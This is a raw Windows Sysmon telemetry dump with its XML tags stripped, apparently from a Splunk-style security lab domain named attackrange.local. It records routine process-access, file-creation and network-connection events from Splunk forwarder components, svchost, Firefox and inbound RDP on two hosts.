09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977552Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977551Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977550Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8961-6151-9C79-00000000FD01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977549Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977548Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977547Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8961-6151-9C79-00000000FD01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977546Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.748{69CF5F33-8961-6151-9C79-00000000FD01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977545Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3405C8B54337B4A7F8D9E2F2C6577DBE,SHA256=B8B1596C072AD22ADB5A0EBB6DBA1B40BFBC37190AD181D289F2BE5D0C1DC661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:37.608{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5C802557E9A7E6669F80C2420303E2C,SHA256=246A1451E64D99C7B4E27D0B65934D8A42029559440589A06ACA95C167656365,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:35.969{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50594-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:37.423{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC57364381D7D6645E51AB0ECA198032,SHA256=59C9F2A789978ABD81653EE9E4591EFF80F4F2BDEADAB9765E972EFC74AB2DF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:36.163{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53268-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001048855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:38.423{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA28E45E4DDDD953ACB408073EABBD8F,SHA256=03050D1D067447D1AD5388C7F197ABC7468EE0CEFA9F6CF5CC675170DE309828,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977560Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:38.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=763E6FC14725988EEE00B6034AE4FDE3,SHA256=99931E1DFC02F0FC3E83D551073C197CA8CF497840FA84C53362A1E619263361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977559Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:38.638{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=765D9ED40CC2948D80A6B8A8EB0D93E4,SHA256=6608B66D78E0A15A1F245BEF8E6062084551D286629F073CD7612874D71147AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977563Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:39.654{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=105A0DCB0B585D91B1D7E2A32CAA435A,SHA256=6BE6C8B1931753996553A64143EA9219E97A16C490A4B17069C42B880654B609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:39.424{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5A7B4DF3D39364D271E1D2C3CEE3B1,SHA256=018F48E1810EF28F2E11EFA0104F56C22E041EEFAC8A000F4DC63ADC3BF8DBDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:39.223{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=98AC36DC0EAB602C99E1F91B1EFB5A2C,SHA256=9D04587B201DB748B86645B132C2ABB5F720F4BBD852471A3164139EADF9A589,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977562Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:36.422{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-39921-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977561Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:35.720{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59308-false10.0.1.12-8000- 23542300x8000000000000000977564Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:40.700{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11C84D162456F8A8C5141986CEEA0E12,SHA256=02E65EF9C8DD4F26F79F44CB2545D1CAF90AA724FE1CC91E8A1C7F22B0589B1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:38.746{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53269-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:38.643{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64842-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:40.439{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD63B568F378C8A292DB55109778759C,SHA256=CC6A640BED5F10205202ECA29ABD55F9CD71663B2E910DB5293F902D8787493A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977566Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:41.794{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7117FB3D7CF70859271CDC17754345D,SHA256=1CEDC047D21A01F83570952FEA5449B212901D9DC492F7E0E98E54EBFB5ABAC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:41.485{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=898C69D8227175005AAEB2A7A197784E,SHA256=E07E4EBCAA5FAE6593CDE17AE6E94D75CCE8BCF3137C9C76B36EBA009E61B925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977565Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:41.419{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9920C7DB240DD75BA9E397559C172CC,SHA256=928D2BA762E556A978292DA9050519523F020923A8D5A8076416355B4EAA61F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:41.222{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37A0F5269E850F68CD274EAE454D4540,SHA256=CED5C9032E1880FCFCA0A96740024585D992251246A87592FD608E1B70AFDB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977567Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:42.809{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D9E5FFE58BC991D6CB3D3531219C40F,SHA256=D2F33CB833F2F9B0799193AAA8A6C07B278FB0820D1B2B6BFB0F140E7807CBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:42.512{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E35E57FF037DB93CA14B669DEE11F9E8,SHA256=DBD4200D1C58E250FEC79B94BEF9C49B9D7B0FC6E06221680BD680D410A96302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977570Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:43.841{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEDEEE520AAD1701691C8291C60568B6,SHA256=80AA1519917CFA094219AE91E9C206C31E9DF0D6A1357CB834B42E9ADF6327A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.825{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=507C3D492A97CAE0EC7B770E245D66E7,SHA256=7BCBA381724177399E8131EABC3FFAE7BEA160A55AB2B10A527EA1310D9A48E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:41.839{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53270-false142.250.185.170fra16s51-in-f10.1e100.net443https 354300x80000000000000001048920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:41.837{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54648- 354300x80000000000000001048919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:41.835{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50932- 23542300x80000000000000001048918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.607{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=B50CF628E0082A7840D84D0CBE1CAD48,SHA256=544DF79BCEF9DC8E082021E342C2A1B12CD0B8BDAF3687E0F23785406EDF33AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.607{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=F130C472E963FF3CEED251C65964B927,SHA256=E5D2A5BBE8AA43751EF7F7BC3A817A0963D56272A4C9B6055E60929606186CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.607{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=5F93E0F827909390D257EBB27C77F392,SHA256=5BCB684F3EE3B2EC2F4945655FBEF281C487399D6BF90451647DB1761715D4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.607{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=9275B832091D9E3BFE50898A3BE022B5,SHA256=38C52A5435B625083000A054489B95E033F7B352377510DF668CEE749DE5803E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=8AC8A05028631170937EDA4CF0E0A35A,SHA256=456AB2C0E4E117D62DC529362EB22C725D410098868442729ADE5E4FF0822E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=7BBA9B83F0F213C5A723209D4C9962CE,SHA256=E1B8E7DEB0F34EEB6BF4D10E47E734A1FE829C365DF360B98646D7E11F2DD4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=16BF2AA546411BA25DC80EA288D47143,SHA256=524EC56C023155C7BE4C84D5AEC4FE2D85DFBAB3C2FA27F82BCD35028D546F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=69EE5B232870704AFCC0E8957AA42A0F,SHA256=EC8DF5279022B68C0B542EC1688889374754106DFADBF7CAF8337E3F98865941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=C143402B1C4118ED7B00874BB55D3156,SHA256=681A0704C2C3DBDFB684A05706A01805E4A396ACFDA7D8D591E54237E4DEE64A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=489DDF1C6CFFF3875F1BECD21EE3A913,SHA256=10226DBCFA9F6058B8A2FF0536E4A23EAF40F4CC71CC6168647D97C1D538D4AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 